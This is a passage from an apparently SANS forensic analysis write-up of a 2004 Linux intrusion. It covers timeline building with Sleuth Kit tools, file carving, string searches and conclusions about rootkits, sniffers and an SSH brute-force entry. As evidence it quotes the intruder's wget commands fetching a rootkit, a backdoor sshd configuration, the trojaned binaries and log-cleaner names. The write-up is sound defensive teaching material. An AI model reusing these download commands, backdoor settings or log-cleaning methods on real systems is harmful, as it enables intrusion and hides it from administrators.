As we began our timeline analysis we wanted to first start off by grabbing deleted, but intact inodes. Our target timeframe we choose was 60-days prior to when the rootkits were installed, in this case we started on May 01 2004. We wanted to be able to find any suspicious data with large amounts of unallocated inodes or inodes with large sizes. Specifically, we were targeting large, non executable files in hopes to grab some of the tar files the intruder deleted. This step kind of acts as both a timeline and recovery of deleted data. We ran the below commands for every partition image;

```
lls -f ext2 -m /04-34/hdc1.img > hdc1.ils
mactime -b hdc1.ils 05/01/2004 > hdc1.deleted.mac
```

Only 2 significant finds throughout the entire image, inodes 130407 and 130408. I used “icat” on the var.img file to pull these files down.

```
icat 04-34/hdc4.img 130407 > 130407.img
```

Turns out they were boot logs showing admin going into single user mode, and conducting a lot of partition recovery procedures -- not good. As a result, most of our deleted inode searches for this time period were now nothing more than
lost fragments scattered throughout the image.

Perhaps foremost could help us out with this task. First we will need an unallocated image for our analysis. I used Autopsy to grab the dls output for me for each image file. Then, I added an ELF Linux header and footer into the foremost.conf file so we could look for these. Finally, I executed foremost;

```
[foremost.conf]
ELF Y 100000'\x7f\x45\x4c\x46\x01
```

Foremost -q -o ./foremost -c /usr/local/src/foremost-0.64/foremost.conf /forensics/0434/host1/output/hdc1.unnal.img

Foremost did pull down tons of PGP mail messages (remember those were removed by the intruder), elf executables, compressed tar file, and zip files. However, most of these files were a concatenation of several blocks of data with the matching headers. So, they were not carved out enough to run “zcat”, or “gunzip” on them to uncompress or “tar -tvzf” to list the contents. I tried to tweak the header and footers and size limits but maybe I’m just not understanding foremost too well. I decided to use Autopsy for assistance.

The good thing was I did already have unallocated images for each of my partitions that I could use later to conduct string searches.

**MAC Time Analysis**

At this point we were very confident we knew how the intruder got access and what was installed to maintain access. Our initial suspicious that the compromise took place on or between 27-28 Jul 2004, however, was really off by about a month. The MAC timeline we generated shows us the potential date of intrusion (according to rootkit installation) was Wed Jun 23 2004. The problem is however, this system had several rootkits installed on it; The SSH rootkit mirrors the Jun 23 date, the mYrk rootkit appears to have been installed on 28 Jul, and finally the OSF trojan looks like a 30 Jul install. So, this presented us with a large amount of work to accomplish as we tried to weed through a month of intruder activity mixed in with a lot of normal operations and noise. We did know when the system was first built, when it crashed, and when it was last accessed with all of our analysis so far, and that helped a big deal when we scrubbed through large amount of timeline activity, especially during all of the reboots and kernel loading when the system had crashed.

Attached are full timelines we performed on all of our images. My thought process for this was to generate, really, five types of time lines; (1) Recursive through the entire drive looking for basic timestamps and hidden directories and files within key directories, (2) generate a timeline of the system using “find” looking for inodes newer than system installation (3) generate an overall timeline of the system using “fls” for directory and files names, (4) produce an
inode listing of deleted but intact inodes listings and (5) use “icat” to pull significant data found, or data that surrounds known malicious files (since the intruders installations should be sequential too).

(1)
ls -Rrlta
find . -name ".. " -print -xdev
find . -name ".**" -type d -printf "%Tc %k %h/%fn"
find . -name ".**" -type f -printf "%Tc %k %h/%fn"
find / -name ".**" -print -xdev | cat -v

(2)
find . -cnewer /mnt/04-34/root/tmp/install.log -print0 | xargs -0 ls -lncad \ls -l | sort | uniq | sort

(3)
fls -f linux-ext2 -m / -r hdc1.img > hdc1.fls

(4)
ils -f linux-ext2 -m hdc1.img > hdc1.ils
mactime -b hdc1.fls 06/01/2004 > hdc1.fls.mac
mactime -b hdc1.ils 06/01/2004 > hdc1.ils.mac

(5)
icat hdc1.img {significant inode range} > hdc1.inode

Below are slices of the MAC timelines I created for each image, and my comments to what I think might be taking place. The biggest benefit to creating the mactime files was it showed us pretty clearly the activity that surrounded suspicious events and the tools that were implemented. In addition, it brought to light other files and directories that needed investigation, and were missed with all the previous analysis.

---------------------------------------------------------------------
root.04-5.mac (hdc1.img)
---------------------------------------------------------------------
Here we clearly see an installation of an ssh server, our suspected rootkit. Notice the libraries accessed as the program is compiled.

Wed Jul 28 2004 05:26:50 16 m. l/lwxrwxrwx 0 0 93565 /lib/libproc.so ->
libproc.so.2.0.6
Wed Jul 28 2004 05:26:52 33848 ..c -rwxr-xr-x 0 0 93563 /lib/libproc.a
 16 ..c l/lwxrwxrwx 0 0 93565 /lib/libproc.so -> libproc.so.2.0.6
 37984 ..c -rwxr-xr-x 0 0 93564 /lib/libproc.so.2.0.6
Wed Jul 28 2004 05:26:59 4096 m.c d/rwxr-xr-x 0 0 93570 /lib/security/.config
 97093 ..c -rwxr-xr-x 500 500 93576 /lib/security/.config/ssh/sshd
(deleted-realloc)
 407 m.c -rwxr-xr-x 0 0 93577 /lib/security/.config/ssh/sshd_config
 4096 m.c d/rwxr-xr-x 0 0 79638 /lib/security/.config/ssh
 14 m.c -rwxr-xr-x 0 0 50710 /lib/libext-2.so.7
Following are the trojanized binaries under the user account of 'okray'. Notice too the meta data addresses in the range of 3500 and 30700, I'd suspect everything around those numbers. Although the mYrk rootkit does trojanize the same binaries, it appears the SSH rootkit is in fact our suspect for these files.

Here we see the etc/shadow file being modified and changed? That's just odd, especially since no new users were created. This matches around when user 'okray' had issued the 'passwd root' command. About an hour later we see the creation of the BitchX IRC server.
We can see the creation, and access (omitted) for the OSF trojan clean file. I still did not see within the mactime files the actual infection of this trojan, so it's still a bit of a mystery why a clean file was run. Around the same time I noticed the 'fuser' command being created, that's just odd. This command is used to find processes using files or sockets, so it's a suspected binary as well.

Below is just a small sample of what appears to have been a linux reconfiguration, this is a large part of the entire time table for this image. I'm not sure how or why this was initiated, or by whom.
The below activity shows more SSH configuration that gives us the pattern to what we saw in the history and terminal sniffer files.

I was able to pull down an SSH config file within unallocated space using icat. Thanks to this mactime finding the inode of interest was fairly easy -- we had missed this file with our previous analysis. As this file shows, could the victim server once had port 31313 open?

Port 31313
ListenAddress 0.0.0.0
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts no
especially the main rootkit called 'zic' (mYrk). I would suspect all files within the 32400 range as suspect too.

Wed Jul 28 2004 05:26:59  73 m.c -rw-r--r-- 500  500  146455 /include/hosts.h
  73 ..c -rw-r--r-- 500  500  146461 /include/log.h
  86 ..c -rw-r--r-- 500  500  146447 /include/file.h
  4096 m.c drwxr-xr-x  0  145519 /include
  89 ..c -rw-r--r-- 500  500  146473 /include/proc.h

Four hours later, IRC is installed.... Ew, evil server patch....

Wed Jul 28 2004 12:38:36  4309 ..c -rw-r--r-- 0  213502 /src/redhat/SPECS/bitchx.spec
  754 ..c -rw-r--r-- 0  246512 /src/redhat/SOURCES/bitchx-1.0c18-ipv6.patch
  182 ..c -rw-r--r-- 0  245771 /src/redhat/SOURCES/bitchx-1.0c18-configure.patch
  6714 ..c -rw-r--r-- 0  245711 /src/redhat/SOURCES/bitchx-1.0c18-evil-server.patch
  4866 ..c -rw-r--r-- 0  245613 /src/redhat/SOURCES/bitchx-configs.dif

This struck me as very strange, almost two-days later the log cleaner called 'wclean' is installed, and run. Why wait so long? Also, we see the first implementation of the terminal sniffer, again why wasn't this executed upon install?

Fri Jul 30 2004 03:34:05  18799 ..a. -rw-r--r-- 0  241240 /lib/i386/wclean
Fri Jul 30 2004 03:35:10  4096 m.c drwx------ 0  213496 /lib/i386
  18799 ..c -rw-r--r-- 0  214260 /lib/i386/wclean
Fri Jul 30 2004 03:35:28  4096 .a. drwx------ 0  213498 /lib/i386/logz

This was very interesting, the times seem to match when I saw an linux reconfig in the root mactime file... and now we see an installation of the psmisc tools (admin tools). Could it be someone had suspected a compromise and tried to rebuild and run scanning tools? Both the admin and user okray deny
this, so I'm at a loss... but it's significant, somehow.

Sat Jul 31 2004 08:40:57 5600 ..c -rw-r--r-- 0 0 359075 /src/redhat/BUILD/psmisc-21.2/po/de.po
  29467 ..c -rw-r-- 0 0 359101 /src/redhat/BUILD/psmisc-21.2/config.sub
  19468 ..c -rw-r-- 0 0 181895 /src/redhat/BUILD/psmisc-21.2/src/pstree.c
  432 ..c -rw-r-- 0 0 359066 /src/redhat/BUILD/psmisc-21.2/po/remove-potcdate.sin
  1203 ..c -rw-r-- 0 0 359069 /src/redhat/BUILD/psmisc-21.2/po/en@quot.header
  5709 ..c -rw-r-- 0 0 359079 /src/redhat/BUILD/psmisc-21.2/po/pt.po
  5623 ..c -rw-r-- 0 0 359077 /src/redhat/BUILD/psmisc-21.2/po/fr.po
  4035 ..c -rw-r-- 0 0 359085 /src/redhat/BUILD/psmisc-21.2/po/pt.gmo
  5243 ..c -rw-r-- 0 0 359076 /src/redhat/BUILD/psmisc-21.2/po/en.po

-----------------------------------------------
var.04-5.mac (hdc6.img)
-----------------------------------------------
Here is where we see the initial, possible, date of the SSH rootkit called (ssk or ShKit). What does not make sense to me is only the modified timestamp applies, showing Jun 23 2004, however the creation of the rootkit checker, log cleaner, and ssh config file didn't happen for another month. It would appear that maybe the files with the Jun timestamp were mv from another location, that wouldn't change inode values, or creation times. Or, maybe we have some timeline manipulation that occurred. Even worse, maybe this system had been compromise a lot earlier and we are just seeing modifications to data that had already been written. If that's the case, again why would the intruder wait so long in order to start covering their tracks?

Sun Jun 27 2004 04:02:03 0 m.. -rw------- 0 0 130424 /log/vsftpd.log.4
  0 m.. -rw------- 0 0 130410 /log/boot.log.4
  0 m.. -rw------- 0 0 130414 /log/spooler.4
Sun Jun 27 2004 12:24:24 10720 m.. -rw-r--r-- 0 0 342137 /lib/games/.src/ssk/config.cache
    71076 m.. -rw-r--r-- 0 0 342136 /lib/games/.src/ssk/config.log
Sun Jun 27 2004 12:24:26 57561 m.. -rw-r--r-- 0 0 342138 /lib/games/.src/ssk/config.status
We see some var/log files presumably being written to, although it would appear they have been created as well, maybe deleted? Shortly afterwards, the intruder finally installs the findkit tool and log cleaner, and creates and configures the SSH server.

Here it appears there is some attempt to do some housecleaning....

Recovering Deleted Files

We significantly tailored down our efforts to retrieve deleted files for primarily three reasons. One, most of the install binaries and tar files were still intact on the victim hard drive -- thanks to it crashing the intruder was not able to remove everything. Two, most of the malicious files we saw the intruder download and
'make' have already been analyzed to death. And three, the hard drive partitions have been run through the recovery process several times by the admin, whereas lost chains/sectors were removed, over-written, etc and trying to carve out data in a meaningful order was proving to be too tedious.

We decided to concentrate on just a couple of areas; obtaining the tarball, if any, for the mYrk rootkit since I don't see this documented on the web, and trying to discover anything else interesting or otherwise missed.

Aside from using my methods above during my timeline analysis, I used autopsy to quickly pull the deleted files for me from every image. Sadly, however, about 98% of everything recovered had already been reallocated by other data. I spent a lot of time still going to those inodes (metadata section), then searching surrounding blocks for any “slack” data still present (data unit section). Bottom line, we failed in our objective to find out how the mYrk was installed. Leaving on a good note though, it wasn't really possible to recover much of anything if we wanted, but since the system crashed we had most of the install binaries anyway.

Conducting a String Search

Keywords and Search Procedures

Simply, I used Autopsy's “keyword Search Mode” to extract unallocated images for each of my partitions first, then produce a strings output from the entire image. Next I would read the strings output from the unallocated image and begin my keyword searches. Honestly, the keyword search really shed some light into the data areas we were unable to successfully recover in a meaningful way. This step reaffirmed log entries were modified, moved, and simply replaced.

Additionally, we found an installation script for the mYrk root kit, seems there is suppose to be a lot more to this. Next, we saw tons of hacker examples, tutorials, password crackers, etc as deleted data, probably part of the README's or HOWTO's files. Finally, we found specifically two things very interesting, references within a fragmented installation script for ”.desktop" and “driftnet”. The file .desktop was trojanized to sniff modifications to system files (like a hackers tripwire) and driftnet was used to capture network traffic, specifically to intercept and forward web traffic images. Below are some of the keywords I used in my analysis;

((jun)|(jul)|(jun?)|(jul?)|2004) -----------------------> I'm looking for past log entries for a two month period surrounding our incident. We know the logs were modified so hopefully this will shed some light

69\1.0\[0-2]??[:digit:]{1,2}\1206\168\[0-2]??[:digit:]{1,2} -----------------------> I'm looking for our two primary intruders.
myrk|logz|ix86|/dev/tty|var/log|clean |srm ------------------------> Key word searches for mYrk
linuxhell | haitateam | fileserv1 | mirror\trouble | egen1234 | egensolutions | rpmfind\net \typeid | add512 | scponly ------------------------> Searching for all sites intruder used

I thought it would be interesting to provide some snippets of the strings output that helped solidify our analysis and suspicions;

Maybe the hackers name -- Sensei?
422287 clean:
  634705 echo 'dont fuck with sensei
  714524 mostlyclean-compile:
  714570 clean-compile:
  714586 distclean-compile:
  714622 maintainer-clean-compile:
  715617 mostlyclean-tags:

One of the cleaning scripts install scripts was seen in unallocated data.
  5497185 mig-logcleaner.c
  5497337 utmp_clean
  5497361 lastlog_clean
  5497375 txt_clean
  5508608 /var/log/
  5508737 [0;32m* MIG Logcleaner by
  5508839 /var/log/wtmp
  5509624 /var/log/lastlog
  5511200  [-d <dir>]  - log directory (default: /var/log/)

A little hint about the mYrk rootkit in deleted areas.
  387140864 No params installs the rootkit (silent mode)
  387143099 /usr/lib/ix86
  387143136 logz
  387143233 /dev/tty
  387143437 Install (load) rootkit
  389449291 /dev/tty

This was very interesting, appears to be an install of new.tar.bz2 for the ntp overflow.
  43058623 - ix86: make sure that rpm can verify prelinked shared libraries.
  43776176 - Enable assembler on ix86 (using new .tar.bz2 which does
  43897645 - Add the remote root exploit patch (based on ntp-hackers).

I thought this was funny, there's a lot more but basically it is register calls and hackers vulgar translations for them.
  232263840 A hacker does for love what others would not do for money.
  232264733 Core Dump, The shit has been purged
  232264812 eax, damn dog always shits in my yard
  232628855 pts0: 8111 (0): -bash: locate .sniffer
A hidden tar file, the SSH tar file, BitchX, and the psybnc toolset (IRC proxy) all in one!

    174162889 >.tar.gz</B
    174165898 >.tar.gz</B
    174671315 HREF="ftp://ftp.postgresql.org/pub/postgresql-7.2.1.tar.gz"
    174671389 >ftp://ftp.postgresql.org/pub/postgresql-7.2.1.tar.gz</A
    174671574 >gunzip postgresql-7.2.1.tar.gz</B
    232183715 * grep-2.1.1b.tar.gz available.
    232628641 pts0: 8111 (0): -bash: wget stupid.go.ro/sk.tar.gz
    232629520 pts0: 8111 (0): -bash: wget http://packetstormsecurity.org/Crackers/john-1.6.tar.gz
    232631854 wget http://www.bitchx.org/files/binaries/Linux/BitchX-1.0c16-Linux-glibc2-alpha.tar.gz
    232631942 pts0: 8208 (0): -bash: ^Cwget 208.42.160.121/~fbi/BitchX-1.0c16-Linux-glibc2-alpha.tar.gz
    234940351      cd ..; tar -cvf psyBNC2.3.1.tar psybnc; gzip -c psyBNC2.3.1.tar > psyBNC2.3.1.tar.gz; rm psyBNC2.3.1.tar
    234951331     Unpack it with tar -xzvf psyBNC2.3.1.tar.gz

And finally, here is the mYrk find.....

======================================
  mYrk - Further Analysis From Strings Output of Lost Installation Script
======================================

Using method described in http://www.securityfocus.com/archive/1/225543
"SSH crc32 compensation attack detector exploit"

    /etc/rc.d/rc.sysinit:
        ---
        # Xntps (NTPv3 daemon) startup..
        /usr/sbin/xntps
        ---

The following system files were added or replaced with trojans
    /bin/ps
    /bin/ls
    /bin/netstat
    /usr/sbin/xntps
    /lib/libproc.so.2.0.0
    /sbin/syslogd

The following files/directories were added, backdoor setup to listen on port 33221
    /lib/liblip.so/con (ssh config file)
    /lib/liblip.so/hk (ssh private key)
    /lib/liblip.so/hk.pub (ssh public key)
    /lib/liblip.so/sd (binary)
    /lib/ldd.so/tkp (perl) -----------------> variant of LinSniffer
Re-Hashing Integrity Of Our Images

Our last step with this investigation was to re-accomplish another MD5 hash for all of our images to ensure we didn't modify any of the evidence. A quick hash, and “diff” for each file showed no alterations -- our tools and procedures did not modify the evidence in any way.

Conclusions

Method of Compromise/Intruder Activity

I'm going to go back to our initial assumptions, questions, and facts we had about this incident and see how our final analysis brought everything together. But if I were to sum everything up in a few words, the intruder habits and processes were very lazy, loud, visible, clumsy -- yet, carefully choose a victim system rarely used and hardly noticed. The timestamps for the most part indicated a compromise around 27 Jul, but as early as 23 Jun. It's still a bit confusing why the cleanup scripts and actions were not accomplished during the installation of the rootkits, unless the intruder had no fear of being noticed (remember, system sitting in a corner collecting dust) or some sort of time modification was accomplished. Below is a quick snapshot of our findings;

- SSH was the entry point through a brute force attack against roots password. Evidence shows it's probably the application called 'haitateam' witch is an SSH brute forcer. It also contains an app called scan.sh for general probing.
- The Date of compromise depends on what trojan or rootkit we are talking about. Our analysis showed the initial compromise may have been on 23 Jun 2004 when the SSH rootkit was installed. The mYrk rootkit was installed on 28 Jul, followed by the OSF trojan a few days later.
- The system was unresponsive - We saw this occurred on 2 Aug as a result of the mYrk rootkit calling a space in memory not compatible with our kernel version. The system crash had two affects; the intruder was unable to clean
up all the tracks, but we were unable to recover all of the data either -- stale mate.

- Roots password did not work - We saw what roots password originally was, q1w2e3r4. However, we also saw in user okray's history file that he changed root's password. In fact, we ran crack on this hash I pulled from the shadow file and it took about 2 ½ weeks to crack-- so we definitely know it was changed.

- The NIC was in PROMISC mode - Pick a rootkit, all of them seemed to put the NIC in this mode. We saw a portless sniffer, desktop sniffer, web sniffer, and a 'linsniffer' variant. We also saw the NIC enters PROMISC mode during bootup.

- An IRC server was installed - On 31 Jul the BitchX IRC was installed as an RPMpkg

- Key system binaries were owned by user “okray” instead of “root” - We suspected this all the time, and we know the SSH rootkit was responsible.

A last check, I ran version 0.40 of the chkrootkit app, here's a snipit;

```
Checking `login'... INFECTED
Checking `ifconfig'... INFECTED
Checking `ifconfig'... INFECTED
Checking `basename'... INFECTED
[.....]
```

- The system might have been infected with the linux.osf.8759 Trojan - We never saw how the system got infected, but we did see the intruder run the script to clean it. We also saw the intruder run 2 other utilities checking to see if either previous rootkits existed or if his rootkit could be detected.

- We know that the /var/log files have been modified (missing entries, timestamps do not match, etc). There were several scripts we recovered that can accomplish this, most notable "v" and 'wclean'.

- We found another rootkit hiding under the games directory that was a trojanized SSH server. After all of our analysis, it looked like this rootkit and mYrk were really similar. The backdoor for this sat on 33221.

References

'Scans of the Month', may 2001-2002
Project.honeynet.org/scans/

'Linux's loopback device', 2003-2004
www.trekweb.com/~jasonb/articles/linux_loopback.shtml

'Reverse Code Engineering', Lonstantin Rozinov, August 12, 2004

The Sleuth Kit Informer, Mar 15, 2003
Www.sleuthkit.org/informer, Issue #2
Law Enforcement and Forensic Examiner to Linux, 2004
Barry Grundy, ver 2.0.5

-----------------------------------------------------------------------------------------------
Attached Timeline
## Upcoming SANS Forensics Training

<table>
<thead>
<tr>
<th>Event Name</th>
<th>Location</th>
<th>Dates</th>
<th>Venue</th>
</tr>
</thead>
<tbody>
<tr>
<td>SANS Cologne October 2020</td>
<td>Germany</td>
<td>Oct 26, 2020 - Oct 31, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>Instructor-Led Training</td>
<td>Oct 26 ET</td>
<td></td>
<td></td>
</tr>
<tr>
<td>SANS Geneva October 2020</td>
<td>Switzerland</td>
<td>Oct 26, 2020 - Oct 31, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS DFIRCON 2020</td>
<td>Miami, FL</td>
<td>Nov 02, 2020 - Nov 07, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS London November 2020</td>
<td>United Kingdom</td>
<td>Nov 02, 2020 - Nov 07, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Sydney 2020 - Live Online</td>
<td>Sydney, Australia</td>
<td>Nov 02, 2020 - Nov 14, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>South by Southeast Asia Nov 2020</td>
<td>Singapore</td>
<td>Nov 02, 2020 - Nov 14, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Paris November 2020</td>
<td>France</td>
<td>Nov 02, 2020 - Nov 07, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Sydney 2020</td>
<td>Sydney, Australia</td>
<td>Nov 02, 2020 - Nov 14, 2020</td>
<td>Live Event</td>
</tr>
<tr>
<td>SANS Gulf Region 2020</td>
<td>Dubai, United Arab Emirates</td>
<td>Nov 07, 2020 - Nov 26, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>APAC ICS Summit &amp; Training 2020 - Live Online</td>
<td>Singapore, Singapore</td>
<td>Nov 13, 2020 - Nov 28, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Amsterdam November 2020</td>
<td>Netherlands</td>
<td>Nov 16, 2020 - Nov 21, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS FOR508 Rome 2020 (in Italian)</td>
<td>Rome, Italy</td>
<td>Nov 16, 2020 - Nov 21, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Atlanta Fall 2020</td>
<td>Atlanta, GA</td>
<td>Nov 16, 2020 - Nov 21, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS San Diego Fall 2020</td>
<td>San Diego, CA</td>
<td>Nov 16, 2020 - Nov 21, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS FOR508 (In Spanish) Online 2020</td>
<td>United Arab Emirates</td>
<td>Nov 23, 2020 - Dec 04, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Frankfurt November 2020</td>
<td>Germany</td>
<td>Nov 30, 2020 - Dec 05, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS San Francisco Winter 2020</td>
<td>San Francisco, CA</td>
<td>Nov 30, 2020 - Dec 05, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>Tokyo December Live Online 2020</td>
<td>Japan</td>
<td>Nov 30, 2020 - Dec 11, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Austin Fall 2020</td>
<td>Austin, TX</td>
<td>Nov 30, 2020 - Dec 05, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Wellington 2020 - Live Online</td>
<td>Wellington, New Zealand</td>
<td>Nov 30, 2020 - Dec 12, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Nashville 2020</td>
<td>Nashville, TN</td>
<td>Dec 07, 2020 - Dec 12, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS London December 2020</td>
<td>United Kingdom</td>
<td>Dec 07, 2020 - Dec 12, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Paris December 2020</td>
<td>France</td>
<td>Dec 07, 2020 - Dec 12, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Cyber Defense Initiative 2020</td>
<td>Washington, DC</td>
<td>Dec 14, 2020 - Dec 19, 2020</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Threat Hunting Europe 2021</td>
<td>United Kingdom</td>
<td>Jan 11, 2021 - Jan 16, 2021</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Security East 2021</td>
<td>New Orleans, LA</td>
<td>Jan 11, 2021 - Jan 16, 2021</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Cyber Security Central: Jan 2021</td>
<td></td>
<td>Jan 18, 2021 - Jan 23, 2021</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Tokyo January 2021</td>
<td>Tokyo, Japan</td>
<td>Jan 18, 2021 - Jan 23, 2021</td>
<td>CyberCon</td>
</tr>
<tr>
<td>SANS Security Fundamentals 2021</td>
<td>Netherlands</td>
<td>Jan 18, 2021 - Jan 29, 2021</td>
<td>CyberCon</td>
</tr>
</tbody>
</table>